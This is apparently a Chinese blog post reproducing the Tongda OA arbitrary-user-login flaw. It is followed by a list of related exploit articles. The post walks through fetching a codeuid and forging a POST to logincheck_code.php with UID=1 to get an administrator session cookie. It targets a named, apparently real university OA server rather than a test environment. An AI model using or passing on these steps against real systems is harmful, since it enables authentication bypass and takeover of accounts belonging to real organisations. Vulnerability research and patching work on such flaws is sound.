通达OA任意用户登录复现
1.访问默认管理员后台地址
用户未登录,
弹出如下界面,猜测有通达OA任意用户登录漏洞
2.访问文件https://oaweb.hait.edu.cn//ispirit/login_code.php以获取codeuid。
**
3.访问文件/logincheck_code.php,同时抓包并修改请求包,将请求方式修改为POST方式,传递CODEUID和用户UID,返回的PHPSESSID即身份缓存。
改包内容:
·将请求方式修改为POST
·增加字段:Content-Type: application/x-www-form-urlencoded
·增加参数:UID=1&CODEUID=_PC{D0FD779B-1E0B-DABE-0CF2-2F7C34438498}&
通达OA任意用户登录复现相关推荐
- 通达OA任意用户登录复现(最新)
通达OA任意用户登录复现 0x00 漏洞简介 0x01 影响版本 0x02 环境搭建 0x03 漏洞复现 0x04 修复建议 0x00 漏洞简介 通达OA国内常用的办公系统,使用群体,大小公司都可以, ...
- 通达OA任意用户登录漏洞复现
目录 通达OA任意用户登录漏洞 漏洞描述 影响范围 漏洞复现 通达OA任意用户登录漏洞
- 通达OA 任意用户登录漏洞复现
0x00 漏洞描述 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录. 0x01 影响版本 通达OA < 11.5.200417 版本 通达OA 201 ...
- 通达OA任意用户登录
正值HW期间,一些企业公司办公系统可能使用通达OA,可以利用此漏洞. 漏洞详情 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录. 影响版本 通达OA 11. ...
- 通达OA任意用户伪造登录漏洞分析与复现
2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞.未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件 ...
- 通达OA前台任意用户登录漏洞+RCE漏洞复现
声明 本文仅用于技术交流,请勿用于非法用途 由于传播.利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任. 文章作者拥有对此文章的修改和解释权.如 ...
- 【漏洞复现】通达OA v11.7 在线任意用户登录漏洞
0x00 前言 通达OA V11.7版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外一个方面就是编译在线的uid值进行判断. 具体fofa语法放在下面: app="TDX ...
- 通达OA V11.3 代码审计 (文件上传、文件包含、任意用户登录漏洞)
因为这段时间比较忙,抽出时间写博客很不容易,所以就简单的吧印象笔记里面的内容站上俩,没有写太多具体的分析过程,尽量都在截图中说明了 附件 通达OA11.3源码(未解码,可以自己去下SeayDzend解 ...
- 通达OA任意文件上传/文件包含RCE漏洞分析
通达OA任意文件上传/文件包含RCE漏洞分析 0x01 前提 0x01 漏洞介绍 0x02 漏洞分析 首先下载安装 绕过身份验证文件上传部分 变量传递问题 文件包含部分 0x01 前提 关于这个漏洞的 ...
最新文章
- 多重继承的构造函数和析构函数
- 替换python字典中的key值
- 如何测试tomcat安装成功
- Python面向对象、魔法方法
- scratch desktop的基本使用 - 舞台坐标系
- vs.net2003无法打开.NET的Web应用服务
- FID使用(Frechet Inception Distance score)
- iphone相册怎么加密_苹果手机怎么加密相册?苹果手机照片加密的方法介绍
- 如何运用机器学习预测供应链需求,时间序列数据如何处理?
- python程序员工资-被Python程序员高工资惊到!报告却显示Python热度降了?
- stm32芯片超时无应答解决
- 《那些年啊,那些事——一个程序员的奋斗史》六
- ad20drc错误_AD错误中英文对照
- 华为p40还用麒麟990鸿蒙,华为P40渲染图曝光,2K挖孔屏+麒麟990+鸿蒙OS
- Google及Facebook第三方登录问题,“将你登入到此应用时出错,请稍后再试”
- jquery之empty()方法详解
- 数学- 找规律 HDU3054
- c语言英文排版程序,C语言设计—英文排版系统精品.docx
- AdaBoost算法部分理论推导
- 变色龙嗅探卡功能_变色龙功能